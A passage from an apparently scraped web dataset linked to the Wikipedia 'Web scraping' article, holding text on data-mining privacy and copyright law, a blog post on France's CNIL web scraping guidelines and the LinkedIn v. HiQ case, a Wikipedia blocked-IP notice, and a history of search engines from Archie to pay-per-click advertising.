information to data mining companies who in turn provided the data to pharmaceutical companies. 34 Europe has rather strong privacy laws, and efforts are underway to further strengthen the rights of the consumers. However, the U.S. E.U. Safe Harbor Principles, developed between 1998 and 2000, currently effectively expose European users to privacy exploitation by U.S. companies. As a consequence of Edward Snowden's global surveillance disclosure, there has been increased discussion to revoke this agreement, as in particular the data will be fully exposed to the National Security Agency, and attempts to reach an agreement with the United States have failed. 35 In the United Kingdom in particular there have been cases of corporations using data mining as a way to target certain groups of customers forcing them to pay unfairly high prices. These groups tend to be people of lower socio-economic status who are not savvy to the ways they can be exploited in digital market places. 36 In the United States, privacy concerns have been addressed by the US Congress via the passage of regulatory controls such as the Health Insurance Portability and Accountability Act (HIPAA). The HIPAA requires individuals to give their "informed consent" regarding information they provide and its intended present and future uses. According to an article in Biotech Business Week, i n practice, HIPAA may not offer any greater protection than the longstanding regulations in the research arena, says the AAHC. More importantly, the rule's goal of protection through informed consent is approach a level of incomprehensibility to average individuals. 37 This underscores the necessity for data anonymity in data aggregation and mining practices. U.S. information privacy legislation such as HIPAA and the Family Educational Rights and Privacy Act (FERPA) applies only to the specific areas that each such law addresses. The use of data mining by the majority of businesses in the U.S. is not controlled by any legislation. Under European copyright database laws, the mining of in-copyright works (such as by web mining) without the permission of the copyright owner is not legal. Where a database is pure data in Europe, it may be that there is no copyright—but database rights may exist, so data mining becomes subject to intellectual property owners' rights that are protected by the Database Directive. On the recommendation of the Hargreaves review, this led to the UK government to amend its copyright law in 2014 to allow content mining as a limitation and exception. 38 The UK was the second country in the world to do so after Japan, which introduced an exception in 2009 for data mining. However, due to the restriction of the Information Society Directive (2001), the UK exception only allows content mining for non-commercial purposes. UK copyright law also does not allow this provision to be overridden by contractual terms and conditions. Since 2020 also Switzerland has been regulating data mining by allowing it in the research field under certain conditions laid down by art. 24d of the Swiss Copyright Act. This new article entered into force on 1 April 2020. 39 The European Commission facilitated stakeholder discussion on text and data mining in 2013, under the title of Licences for Europe. 40 The focus on the solution to this legal issue, such as licensing rather than limitations and exceptions, led to representatives of universities, researchers, libraries, civil society groups and open access publishers to leave the stakeholder dialogue in May 2013. 41 US copyright law, and in particular its provision for fair use, upholds the legality of content mining in America, and other fair use countries such as Israel, Taiwan and South Korea. As content mining is transformative, that is it does not supplant the original work, it is viewed as being lawful under fair use. For example, as part of the Google Book settlement the presiding judge on the case ruled that Google's digitization project of in-copyright books was lawful, in part because of the transformative uses that the digitization project displayed—one being text and data mining. 42 The following applications are available under free open-source licenses. Public access to application source code is also available. The following applications are available under proprietary licenses. For more information about extracting information out of data (as opposed to analyzing data), see: |
603 | https://en.wikipedia.org/wiki/Web_scraping | https://medium.com/@finddatalab/can-you-still-perform-web-scraping-with-the-new-cnil-guidelines-bf3e20d0edc2 | Sign up Sign in Sign up Sign in FindDataLab.com Follow Listen Share The General Data Protection Regulation (GDPR) is a law that deals with data privacy and security in the European Union. It affects companies anywhere in the world if they target or collect data from people living in the European Union. The GDPR went into effect on May 25, 2018, and carries large fines for those who break it. While the GDPR went into effect a couple of years ago, data and web scraping are still a topic of discussion in some European Union countries. One of those countries is France; the French Data Protection Authority (CNIL) released new guidelines on web scraping. These new guidelines demonstrate the level of care companies must take in complying with the GDPR. They set in place specific procedures that companies which perform web scraping must follow in order to maintain compliance with the GDPR. This includes companies that collect data on publicly available websites. Conforming to these new guidelines ensures that any company and its vendors perform the necessary procedures to fully comply with all GDPR requirements. What Are The New CNIL Guidelines? The CNIL guidelines made it clear that publicly available data is still personal data. These new guidelines were released on April 30, 2020. This means that any publicly available personal data cannot be repurposed without the knowledge of the person to whom that data belongs. These new guidelines have the potential to impact every French citizen, as well as the companies that are collecting data, as they allow French citizens to opt-out of having their data collected. They have also created clear procedures which every business must follow when collecting data. Obtaining Unequivocal Consent To Reuse Publicly Available Private Data One important aspect to understand when it comes to web scraping is what it means to get unequivocal consent and how you can get unequivocal consent as a web scraper. Unequivocal consent means that you are given very clear and very firm consent to perform a specific task. There are several ways for a web scraper to get unequivocal consent and some rules regarding this. For starters, the users must receive all relevant information in regard to what information is collected and what it will be used for. It is recommended that web scrapers provide the following information to anyone who’s data they collect: This information must be clear, easily accessible, and exhaustive before a company is able to gain someone’s consent. The CNIL follows the GDPR criteria for consent and has given the following recommendations. For starters, the consent should be individual for each purpose. For web scrapers, this means having a distinct data set for each purpose, as well as clearly defining that purpose. The CNIL also recommends that users are able to consent or refuse consent with equal simplicity. Also, if a user does not give their consent for data collection, they cannot be asked again for a specified period of time. Consent should also be renewed at an appropriate interval of time. Performing a Data Protection Impact Assessment You do not need to perform a data protection impact assessment every time you are looking to perform web scraping. However, you do need to perform if there is a high risk to data subjects. There are two scenarios when you would need to complete one of these assessments. The first case is if the processing envisaged is on the list of types of processing operations which the CNIL considers to be compulsory for carrying out the assessment. The second case in which you would need to perform an assessment is if it meets two out of the nine criteria laid out in the G29 guidelines. There are several pros and cons to conducting a data protection impact assessment. For starters, it will take more time for companies to get approval and this could cost them. However, this extra time gives users more protection over their data. It also ensures that companies take the time to evaluate how they will handle and protect the data. Another con, however, is that some useful data collection may not take place if their data protection impact assessment is not accepted. If more companies have to perform these types of assessments, there might be fewer companies that do data collection and, thus, leave data in the hands of only a few companies. There are several key steps that you can perform when carrying out a data protection impact assessment. The first step is identifying the need for a DPIA. If you do need to perform a DPIA, start by describing the process and then lay out how why you plan to use the data you have collected. This should include the nature, scope, context, and purposes of the processing. The third step is to consider a consultation. Next, assess the necessity and proportionality of the data collection. You also need to identify and assess any of the risks that may come up. After you have identified any risks, you must find ways to mitigate those risks. Finally, you need to record several different items such as any other measures you will take in regard to data collection and protecting that data. You also need to identify whether the risks have been eliminated, reduced, or accepted, and the overall level of residual risk. Finally, you need to record if you need to consult the ICO. What Do the New CNIL Guidelines Mean for Web Scraping Services? The new CNIL guidelines have impacted web scraping due to the way it limits who you are able to collect data from. For example, you are no longer allowed to collect data from people who have determined that they do not want their data collected, even if that data is publicly available. The new guidelines state that the data should also be relevant and only collected from websites that allow data collection This means that companies which offer web scraping services are no longer allowed to collect irrelevant, excessive, or sensitive data. You Can Still Perform Legal Web Scraping. Here’s How: The CNIL did issue some guidance on collecting data. For starters, the companies need to have an understanding of how long the data processing or web scraping will last. Companies also need to know where the scraped data came from, especially if that company restricts its data collected for commercial reuse. Companies also need to limit the amount of data to only the necessary data for the identified task and not collect any data which is irrelevant to that task. Individuals also have to be informed if they are affected by the collection of their personal data. On top of this, the CNIL wants companies to carefully oversee all of their vendor relationships in regard to data processing. It is recommended that companies comply with all GDPR requirements. Finally, companies may need to do a data protection impact assessment, depending on the type of data they collect and the methods they use to collect it. The LinkedIn vs. HiQ Case and What it Means for You LinkedIn is a popular website that allows employees to connect with workers and companies, helping them grow the number of business relationships they have. HiQ is a data scraping company that collects publicly available data from LinkedIn. There was an increase in the number of companies that were scraping data from LinkedIn and this resulted in a ban on those companies. However, HiQ was able to get around that ban by hiding the IP address that was being used for the web scraping. LinkedIn then sent a cease-and-desist letter to HiQ because they had breached LinkeIn’s ToS and violated the Computer Fraud and Abuse Act. HiQ filed for a preliminary injunction so that it could still function until a later date. The case made its way to Ninth Circuit, where the preliminary injunction was upheld allowing HiQ to collect the data that it wanted. This could potentially impact web scraping services because it could allow them to collect publicly available data from the website, even if doing so breaches that company’s ToS. However, this case is not completely over and LinkedIn may have this case appealed to the Supreme Court. Summing It All Up The world of web scraping is changing as more people and countries push to protect their data. One of those countries trying to protect their citizen’s data is France, who have passed new guidelines on the collection of data. CINL decided that publicly available data still fell under the umbrella of GDPR and established several guidelines on web scraping technologies. CNIL also laid down regulations on how companies should handle data protection impact assessments. These assessments have the potential to protect people’s data better and make sure that data collection companies are also following the rules. However, while these new guidelines do not stop a company from collecting data from individuals, it does allow for individuals to opt-out of having their data collected and limit the amount of data that can be collected. While these new guidelines appear to limit web scraping, a Ninth Circuit Court ruling in the United States seemed to rule in favor of web scraping continuing even when it breaks a company’s ToS. Looking for more information? Check out the legal web scraping guide. Turn any website into data and have it delivered directly to you in any format. Help Status About Careers Press Blog Privacy Terms Text to speech Teams |
604 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=21 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
605 | https://en.wikipedia.org/wiki/Web_scraping | http://www.searchenginehistory.com/ | The concept of hypertext and a memory extension really came to life in July of 1945, when after enjoying the scientific camaraderie that was a side effect of WWII, Vannevar Bush's As We May Think was published in The Atlantic Monthly. He urged scientists to work together to help build a body of knowledge for all mankind. Here are a few selected sentences and paragraphs that drive his point home. Specialization becomes increasingly necessary for progress, and the effort to bridge between disciplines is correspondingly superficial. The difficulty seems to be, not so much that we publish unduly in view of the extent and variety of present day interests, but rather that publication has been extended far beyond our present ability to make real use of the record. The summation of human experience is being expanded at a prodigious rate, and the means we use for threading through the consequent maze to the momentarily important item is the same as was used in the days of square-rigged ships. A record, if it is to be useful to science, must be continuously extended, it must be stored, and above all it must be consulted. He not only was a firm believer in storing data, but he also believed that if the data source was to be useful to the human mind we should have it represent how the mind works to the best of our abilities. Our ineptitude in getting at the record is largely caused by the artificiality of the systems of indexing. ... Having found one item, moreover, one has to emerge from the system and re-enter on a new path. The human mind does not work this way. It operates by association. ... Man cannot hope fully to duplicate this mental process artificially, but he certainly ought to be able to learn from it. In minor ways he may even improve, for his records have relative permanency. Presumably man's spirit should be elevated if he can better review his own shady past and analyze more completely and objectively his present problems. He has built a civilization so complex that he needs to mechanize his records more fully if he is to push his experiment to its logical conclusion and not merely become bogged down part way there by overtaxing his limited memory. He then proposed the idea of a virtually limitless, fast, reliable, extensible, associative memory storage and retrieval system. He named this device a memex. Gerard Salton, who died on August 28th of 1995, was the father of modern search technology. His teams at Harvard and Cornell developed the SMART informational retrieval system. Salton’s Magic Automatic Retriever of Text included important concepts like the vector space model, Inverse Document Frequency (IDF), Term Frequency (TF), term discrimination values, and relevancy feedback mechanisms. He authored a 56 page book called A Theory of Indexing which does a great job explaining many of his tests upon which search is still largely based. Tom Evslin posted a blog entry about what it was like to work with Mr. Salton. Ted Nelson created Project Xanadu in 1960 and coined the term hypertext in 1963. His goal with Project Xanadu was to create a computer network with a simple user interface that solved many social problems like attribution. While Ted was against complex markup code, broken links, and many other problems associated with traditional HTML on the WWW, much of the inspiration to create the WWW was drawn from Ted's work. There is still conflict surrounding the exact reasons why Project Xanadu failed to take off. The Wikipedia offers background and many resource links about Mr. Nelson. ARPANet is the network which eventually led to the internet. The Wikipedia has a great background article on ARPANet and Google Video has a free interesting video about ARPANet from 1972. The first few hundred web sites began in 1993 and most of them were at colleges, but long before most of them existed came Archie. The first search engine created was Archie, created in 1990 by Alan Emtage, a student at McGill University in Montreal. The original intent of the name was "archives, but it was shortened to Archie. Archie helped solve this data scatter problem by combining a script-based data gatherer with a regular expression matcher for retrieving file names matching a user query. Essentially Archie became a database of web filenames which it would match with the users queries. Bill Slawski has more background on Archie here. As word of mouth about Archie spread, it started to become word of computer and Archie had such popularity that the University of Nevada System Computing Services group developed Veronica. Veronica served the same purpose as Archie, but it worked on plain text files. Soon another user interface name Jughead appeared with the same purpose as Veronica, both of these were used for files sent via Gopher, which was created as an Archie alternative by Mark McCahill at the University of Minnesota in 1991. Tim Burners-Lee existed at this point, however there was no World Wide Web. The main way people shared data back then was via File Transfer Protocol (FTP). If you had a file you wanted to share you would set up an FTP server. If someone was interested in retrieving the data they could using an FTP client. This process worked effectively in small groups, but the data became as much fragmented as it was collected. From the Wikipedia: While an independent contractor at CERN from June to December 1980, Berners-Lee proposed a project based on the concept of hypertext, to facilitate sharing and updating information among researchers. With help from Robert Cailliau he built a prototype system named Enquire. After leaving CERN in 1980 to work at John Poole's Image Computer Systems Ltd., he returned in 1984 as a fellow. In 1989, CERN was the largest Internet node in Europe, and Berners-Lee saw an opportunity to join hypertext with the Internet. In his words, "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and — ta-da — the World Wide Web". He used similar ideas to those underlying the Enquire system to create the World Wide Web, for which he designed and built the first web browser and editor (called WorldWideWeb and developed on NeXTSTEP) and the first Web server called httpd (short for HyperText Transfer Protocol daemon). The first Web site built was at http: info.cern.ch and was first put online on August 6, 1991. It provided an explanation about what the World Wide Web was, how one could own a browser and how to set up a Web server. It was also the world's first Web directory, since Berners-Lee maintained a list of other Web sites apart from his own. In 1994, Berners-Lee founded the World Wide Web Consortium (W3C) at the Massachusetts Institute of Technology. Tim also created the Virtual Library, which is the oldest catalogue of the web. Tim also wrote a book about creating the web, titled Weaving the Web. Computer robots are simply programs that automate repetitive tasks at speeds impossible for humans to reproduce. The term bot on the internet is usually used to describe anything that interfaces with the user or that collects data. Search engines use "spiders" which search (or spider) the web for information. They are software programs which request pages much like regular browsers do. In addition to reading the contents of pages for indexing spiders also record links. Another bot example could be Chatterbots, which are resource heavy on a specific topic. These bots attempt to act like a human and communicate with humans on said topic. Search engines consist of 3 main parts. Search engine spiders follow links on the web to request pages that are either not yet indexed or have been updated since they were last indexed. These pages are crawled and are added to the search engine index (also known as the catalog). When you search using a major search engine you are not actually searching the web, but are searching a slightly outdated index of content which roughly represents the content of the web. The third part of a search engine is the search interface and relevancy software. For each search query search engines typically do most or all of the following Searchers generally tend to click mostly on the top few search results, as noted in this article by Jakob Nielsen, and backed up by this search result eye tracking study. Andrei Broder authored A Taxonomy of Web Search PDF , which notes that most searches fall into the following 3 categories: Want to become a better searcher? Most large scale search engines offer: Nancy Blachman's Google Guide offers searchers free Google search tips, and Greg R.Notess's Search Engine Showdown offers a search engine features chart. There are also many popular smaller vertical search services. For example, Del.icio.us allows you to search URLs that users have bookmarked, and Technorati allows you to search blogs. Soon the web's first robot came. In June 1993 Matthew Gray introduced the World Wide Web Wanderer. He initially wanted to measure the growth of the web and created this bot to count active web servers. He soon upgraded the bot to capture actual URL's. His database became knows as the Wandex. The Wanderer was as much of a problem as it was a solution because it caused system lag by accessing the same page hundreds of times a day. It did not take long for him to fix this software, but people started to question the value of bots. In October of 1993 Martijn Koster created Archie-Like Indexing of the Web, or ALIWEB in response to the Wanderer. ALIWEB crawled meta information and allowed users to submit their pages they wanted indexed with their own page description. This meant it needed no bot to collect data and was not using excessive bandwidth. The downside of ALIWEB is that many people did not know how to submit their site. Martijn Kojer also hosts the web robots page, which created standards for how search engines should index or not index content. This allows webmasters to block bots from their site on a whole site level or page by page basis. By default, if information is on a public web server, and people link to it search engines generally will index it. In 2005 Google led a crusade against blog comment spam, creating a nofollow attribute that can be applied at the individual link level. After this was pushed through Google quickly changed the scope of the purpose of the link nofollow to claim it was for any link that was sold or not under editorial control. By December of 1993, three full fledged bot fed search engines had surfaced on the web: JumpStation, the World Wide Web Worm, and the Repository-Based Software Engineering (RBSE) spider. JumpStation gathered info about the title and header from Web pages and retrieved these using a simple linear search. As the web grew, JumpStation slowed to a stop. The WWW Worm indexed titles and URL's. The problem with JumpStation and the World Wide Web Worm is that they listed results in the order that they found them, and provided no discrimination. The RSBE spider did implement a ranking system. Since early search algorithms did not do adequate link analysis or cache full page content if you did not know the exact name of what you were looking for it was extremely hard to find it. Excite came from the project Architext, which was started by in February, 1993 by six Stanford undergrad students. They had the idea of using statistical analysis of word relationships to make searching more efficient. They were soon funded, and in mid 1993 they released copies of their search software for use on web sites. Excite was bought by a broadband provider named Home in January, 1999 for $6.5 billion, and was named Excite Home. In October, 2001 Excite Home filed for bankruptcy. InfoSpace bought Excite from bankruptcy court for $10 million. When Tim Berners-Lee set up the web he created the Virtual Library, which became a loose confederation of topical experts maintaining relevant topical link lists. O'Reilly Media began the GNN project in May 1993 officially launched it in August 1993. It provided an online directory based upon the Whole Internet User's Guide and Catalog it was also the first web site to contain clickable advertisements. Their first advertiser was a law firm named Heller, Ehrman, White and McAuliffe. GNN was acquired by AOL in 1995 shuttered in 1996. The EINet Galaxy web directory was born in January of 1994. It was organized similar to how web directories are today. The biggest reason the EINet Galaxy became a success was that it also contained Gopher and Telnet search features in addition to its web search feature. The web size in early 1994 did not really require a web directory; however, other directories soon did follow. In April 1994 David Filo and Jerry Yang created the Yahoo Directory as a collection of their favorite web pages. As their number of links grew they had to reorganize and become a searchable directory. What set the directories above The Wanderer is that they provided a human compiled description with each URL. As time passed and the Yahoo Directory grew Yahoo began charging commercial sites for inclusion. As time passed the inclusion rates for listing a commercial site increased. The current cost is $299 per year. Many informational sites are still added to the Yahoo Directory for free. On September 26, 2014, Yahoo announced they would close the Yahoo Directory at the end of 2014, though it was transitioned to being part of Yahoo Small Business and remained online at business.yahoo.com. In 1998 Rich Skrenta and a small group of friends created the Open Directory Project, which is a directory which anybody can download and use in whole or part. The ODP (also known as DMOZ) is the largest internet directory, almost entirely ran by a group of volunteer editors. The Open Directory Project was grown out of frustration webmasters faced waiting to be included in the Yahoo Directory. Netscape bought the Open Directory Project in November, 1998. Later that same month AOL announced the intention of buying Netscape in a $4.5 billion all stock deal. DMOZ closed on March 17, 2017. When the directory shut down it had 3,861,210 active listings in 90 languages. Numerous online mirrors of the directory have been published at DMOZtools.net, ODP.org other locations. Google offers a librarian newsletter to help librarians and other web editors help make information more accessible and categorize the web. The second Google librarian newsletter came from Karen G. Schneider, who was the director of Librarians' Internet Index. LII was a high quality directory aimed at librarians. Her article explains what she and her staff look for when looking for quality credible resources to add to the LII. Most other directories, especially those which have a paid inclusion option, hold lower standards than selected limited catalogs created by librarians. The LII was later merged into the Internet Public Library, which was another well kept directory of websites that went into archive-only mode after 20 years of service. Due to the time intensive nature of running a directory, and the general lack of scalability of a business model the quality and size of directories sharply drops off after you get past the first half dozen or so general directories. There are also numerous smaller industry, vertically, or locally oriented directories. Business.com, for example, is a directory of business websites. Business.com was a high-profile purchase for local directory company R.H. Donnelley. Unfortunately that $345 milion deal on July 26, 2007 only accelerated the bankruptcy of R.H. Donnelley, which let them to sell the Business.com directory to Resource Nation in February of 2011. The Google Panda algorithm hit Business.com, which made it virtually impossible for the site to maintain a strong cashflow based on organic search rankings. Business.com was once again sold in June of 2016 to the Purch Group. Looksmart was founded in 1995. They competed with the Yahoo Directory by frequently increasing their inclusion rates back and forth. In 2002 Looksmart transitioned into a pay per click provider, which charged listed sites a flat fee per click. That caused the demise of any good faith or loyalty they had built up, although it allowed them to profit by syndicating those paid listings to some major portals like MSN. The problem was that Looksmart became too dependant on MSN, and in 2003, when Microsoft announced they were dumping Looksmart that basically killed their business model. In March of 2002, Looksmart bought a search engine by the name of WiseNut, but it never gained traction. Looksmart also owns a catalog of content articles organized in vertical sites, but due to limited relevancy Looksmart has lost most (if not all) of their momentum. In 1998 Looksmart tried to expand their directory by buying the non commercial Zeal directory for $20 million, but on March 28, 2006 Looksmart shut down the Zeal directory, and hope to drive traffic using Furl, a social bookmarking program. All major search engines have some limited editorial review process, but the bulk of relevancy at major search engines is driven by automated search algorithms which harness the power of the link graph on the web. In fact, some algorithms, such as TrustRank, bias the web graph toward trusted seed sites without requiring a search engine to take on much of an editorial review staff. Thus, some of the more elegant search engines allow those who link to other sites to in essence vote with their links as the editorial reviewers. Unlike highly automated search engines, directories are manually compiled taxonomies of websites. Directories are far more cost and time intensive to maintain due to their lack of scalability and the necessary human input to create each listing and periodically check the quality of the listed websites. General directories are largely giving way to expert vertical directories, temporal news sites (like blogs), and social bookmarking sites (like del.ici.ous). In addition, each of those three publishing formats I just mentioned also aid in improving the relevancy of major search engines, which further cuts at the need for (and profitability of) general directories. Here is a great background video on the history of search. Brian Pinkerton of the University of Washington released WebCrawler on April 20, 1994. It was the first crawler which indexed entire pages. Soon it became so popular that during daytime hours it could not be used. AOL eventually purchased WebCrawler and ran it on their network. Then in 1997, Excite bought out WebCrawler, and AOL began using Excite to power its NetFind. WebCrawler opened the door for many other services to follow suit. Within 1 year of its debuted came Lycos, Infoseek, and OpenText. Lycos was the next major search development, having been design at Carnegie Mellon University around July of 1994. Michale Mauldin was responsible for this search engine and remains to be the chief scientist at Lycos Inc. On July 20, 1994, Lycos went public with a catalog of 54,000 documents. In addition to providing ranked relevance retrieval, Lycos provided prefix matching and word proximity bonuses. But Lycos' main difference was the sheer size of its catalog: by August 1994, Lycos had identified 394,000 documents; by January 1995, the catalog had reached 1.5 million documents; and by November 1996, Lycos had indexed over 60 million documents more than any other Web search engine. In October 1994, Lycos ranked first on Netscape's list of search engines by finding the most hits on the word surf. . Infoseek also started out in 1994, claiming to have been founded in January. They really did not bring a whole lot of innovation to the table, but they offered a few add on's, and in December 1995 they convinced Netscape to use them as their default search, which gave them major exposure. One popular feature of Infoseek was allowing webmasters to submit a page to the search index in real time, which was a search spammer's paradise. AltaVista debut online came during this same month. AltaVista brought many important features to the web scene. They had nearly unlimited bandwidth (for that time), they were the first to allow natural language queries, advanced searching techniques and they allowed users to add or delete their own URL within 24 hours. They even allowed inbound link checking. AltaVista also provided numerous search tips and advanced search features. Due to poor mismanagement, a fear of result manipulation, and portal related clutter AltaVista was largely driven into irrelevancy around the time Inktomi and Google started becoming popular. On February 18, 2003, Overture signed a letter of intent to buy AltaVista for $80 million in stock and $60 million cash. After Yahoo bought out Overture they rolled some of the AltaVista technology into Yahoo Search, and occasionally use AltaVista as a testing platform. The Inktomi Corporation came about on May 20, 1996 with its search engine Hotbot. Two Cal Berkeley cohorts created Inktomi from the improved technology gained from their research. Hotwire listed this site and it became hugely popular quickly. In October of 2001 Danny Sullivan wrote an article titled Inktomi Spam Database Left Open To Public, which highlights how Inktomi accidentally allowed the public to access their database of spam sites, which listed over 1 million URLs at that time. Although Inktomi pioneered the paid inclusion model it was nowhere near as efficient as the pay per click auction model developed by Overture. Licensing their search results also was not profitable enough to pay for their scaling costs. They failed to develop a profitable business model, and sold out to Yahoo for approximately $235 million, or $1.65 a share, in December of 2003. In April of 1997 Ask Jeeves was launched as a natural language search engine. Ask Jeeves used human editors to try to match search queries. Ask was powered by DirectHit for a while, which aimed to rank results based on their popularity, but that technology proved to easy to spam as the core algorithm component. In 2000 the Teoma search engine was released, which uses clustering to organize sites by Subject Specific Popularity, which is another way of saying they tried to find local web communities. In 2001 Ask Jeeves bought Teoma to replace the DirectHit search technology. Jon Kleinberg's Authoritative sources in a hyperlinked environment PDF was a source of inspiration what lead to the eventual creation of Teoma. Mike Grehan's Topic Distillation PDF also explains how subject specific popularity works. On Mar 4, 2004, Ask Jeeves agreed to acquire Interactive Search Holdings for 9.3 million shares of common stock and options and pay $150 million in cash. On March 21, 2005 Barry Diller's IAC agreed to acquire Ask Jeeves for 1.85 billion dollars. IAC owns many popular websites like Match.com, Ticketmaster.com, and Citysearch.com, and is promoting Ask across their other properties. In 2006 Ask Jeeves was renamed to Ask, and they killed the separate Teoma brand. AllTheWeb was a search technology platform launched in May of 1999 to showcase Fast's search technologies. They had a sleek user interface with rich advanced search features, but on February 23, 2003, AllTheWeb was bought by Overture for $70 million. After Yahoo bought out Overture they rolled some of the AllTheWeb technology into Yahoo Search, and occasionally use AllTheWeb as a testing platform. Most meta search engines draw their search results from multiple other search engines, then combine and rerank those results. This was a useful feature back when search engines were less savvy at crawling the web and each engine had a significantly unique index. As search has improved the need for meta search engines has been reduced. Hotbot was owned by Wired, had funky colors, fast results, and a cool name that sounded geeky, but died off not long after Lycos bought it and ignored it. Upon rebirth it was born as a meta search engine. Unlike most meta search engines, Hotbot only pulls results from one search engine at a time, but it allows searchers to select amongst a few of the more popular search engines on the web. Currently Dogpile, owned by Infospace, is probably the most popular meta search engine on the market, but like all other meta search engines, it has limited market share. One of the larger problems with meta search in general is that most meta search engines tend to mix pay per click ads in their organic search results, and for some commercial queries 70% or more of the search results may be paid results. I also created Myriad Search, which is a free open source meta search engine without ads. The major search engines are fighting for content and marketshare in verticals outside of the core algorithmic search product. For example, both Yahoo and MSN have question answering services where humans answer each other's questions for free. Google has a similar offering, but question answerers are paid for their work. Google, Yahoo, and MSN are also fighting to become the default video platform on the web, which is a vertical where an upstart named YouTube also has a strong position. Yahoo and Microsoft are aligned on book search in a group called the Open Content Alliance. Google, going it alone in that vertical, offers a proprietary Google Book search. All three major search engines provide a news search service. Yahoo has partnered with some premium providers to allow subscribers to include that content in their news search results. Google has partnered with the AP and a number of other news sources to extend their news database back over 200 years. And Topix.net is a popular news service which sold 75% of its ownership to 3 of the largest newspaper companies. Thousands of weblogs are updated daily reporting the news, some of which are competing with (and beating out) the mainstream media. If that were not enough options for news, social bookmarking sites like Del.icio.us frequently update recently popular lists, there are meme trackers like Techmeme that track the spread of stories through blogs, and sites like Digg allow their users to directly vote on how much exposure each item gets. Google also has a Scholar search program which aims to make scholarly research easier to do. In some verticals, like shopping search, other third party players may have significant marketshare, gained through offline distribution and branding (for example, yellow pages companies), or gained largely through arbitraging traffic streams from the major search engines. On November 15, 2005 Google launched a product called Google Base, which is a database of just about anything imaginable. Users can upload items and title, describe, and tag them as they see fit. Based on usage statistics this tool can help Google understand which vertical search products they should create or place more emphasis on. They believe that owning other verticals will allow them to drive more traffic back to their core search service. They also believe that targeted measured advertising associated with search can be carried over to other mediums. For example, Google bought dMarc, a radio ad placement firm. Yahoo has also tried to extend their reach by buying other high traffic properties, like the photo sharing site Flickr, and the social bookmarking site del.icio.us. After a couple years of testing, on May 5th, 2010 Google unveiled a 3 column search result layout which highlights many vertical search options in the left rail. Google shut down their financial services comparison search tool Google Comparison on March 23, 2016. Google has continued to grow their Product Listing Ads, local inventory ads hotel ads while shedding many other vertical search functions. When Google shut down their financial comparison search tool they shifted from showing a maximum of 3 ads at the top of the search results to showing a maximum of 4 ads above the organic search results. By 2015 mobile accounted for more than half of digital ad spending. The online ad market is growing increasingly consolidated with Google Facebook eating almost all of the growth. Google's dominance over desktop search is only increased on mobile, as Google pays Apple to be the default search provider in iOS Android's secret contracts bundled Google as the default search option. Google settled an Android antitrust case in Russia is being investigated in Europe. Due to the increasing importance of mobile Google shifted to showing search results in a single column on desktop computers, with the exceptions of sometimes showing knowledge graph cards or graphic Product Listing Ads in the rightt column of the desktop search results. Ad blocking has become widespread on both mobile devices desktop computers. However Google pays AdBlock Plus to allow ads to show on Google.com Facebook can bypass ad blocking with inline ads in their mobile application. Most other publishers have had much less luck in dealing with the rise of ad blockers. As publishers have been starved for revenues, some publishers like Tronc have sacrificed user experience by embedding thousands of auto-playing videos in their articles. This in turn only accelerates the demand for ad blockers. Facebook Google have been in a fight to increase their time on site on mobile devices. Facebook introduced Instant Articles which ports publisher articles into Facebook, however publishers struggled to monetize the exposure. Google launched a competing solution called Accelerated Mobile Pages (AMP) publishers also struggled to monetize that audience. An additional factor which has stripped audience from publisher websites is the increasing number of featured snippets, knowledge graph results interactive tools embedded directly in Google's search results. These features may extract the value of publisher's websites without sending them anything in return. And they have also caused issues when Google's algorthims chose to display factually incorrect answers. Both Google Facebook are partly to blame for the decline of online publishing. As they defunded web publishers it encouraged more outrageous publishing behaviors. The Internet commoditized the distribution of facts. The "news" media responded by pivoting wholesale into opinions and entertainment. Another contributing factor to the decline of online publishing is how machine learning algorithms measure engagement and fold it back into ranking. People are more often to share or link to something which confirms their political ideology, while fairly neutral pieces that are not biased may have some analysis in them that almost everyone hates, which means they have a less loyal following readers are less likely to share their work. That in turn makes the work less likely to be seen on social networks like Facebook or rank high in Google search results. Search engine marketing is marketing via search engines, done through organic search engine optimization, paid search engine advertising, and paid inclusion programs. As mentioned earlier, many general web directories charge a one time flat fee or annually recurring rate for listing commercial sites. Many shopping search engines charge a flat cost per click rate to be included in their databases. As far as major search engines go, Inktomi popularized the paid inclusion model. They were bought out by Yahoo in December of 2003. After Yahoo dropped Google and rolled out their own search technology they continued to offer a paid inclusion program to list sites in their regular search results, but Yahoo Search Submit was ended at the end of 2009. Pay per click ads allow search engines to sell targeted traffic to advertisers on a cost per click basis. Typically pay per click ads are keyword targeted, but in some cases, some engines may also add in local targeting, behavioral targeting, or allow merchants to bid on traffic streams based on demographics as well. Pay per click ads are typically sold in an auction where the highest bidder ranks 1 for that keyword. Some engines, like Google and Microsoft, also factor ad clickthrough rate into the click cost. Doing so ensures their ads get clicked on more frequently, and that their advertisements are more relevant. A merchant who writes compelling ad copy and gets a high CTR will be allowed to pay less per click to receive traffic. In 1996 an 18 year-old college 